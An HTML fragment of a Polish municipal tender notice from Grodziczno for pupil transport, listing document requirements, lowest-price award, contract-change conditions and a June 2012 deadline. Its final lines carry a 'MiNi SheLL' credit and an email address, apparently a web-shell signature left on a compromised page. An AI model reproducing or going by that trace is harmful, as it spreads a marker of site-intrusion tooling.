<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty, na podstawie którego dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących:
1) wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i kilometrami, 
2) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia, niezależnych od Wykonawcy,
3)  zmian terminu realizacji zamówienia,
4) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia,
proponowanych przez jedną ze stron - jeżeli zmiany te są korzystne dla Zamawiającego,
5) zmian ilościowych dzieci skutkujących zmianami w ilości dowożonych uczniów,
6) zmian uzależnionych od zmiany planów lekcji, ilości dzieci, zmiany organizacji roku szkolonego, odpracowywania dni wolnych, skrócenia godzin nauki etc.
7) inne zmiany, które spowodują ingerencję w określenie przedmiotu zamówienia.
2.	Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w zakresie zmiany stawki VAT według zasad określonych w formularzu ofertowym i w projekcie umowy.
3.	Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy; Grodziczno 17a; 13-324 Grodziczno - sekretariat pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 08:30, miejsce: Urząd Gminy; Grodziczno 17a; 13-324 Grodziczno - sekretariat pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com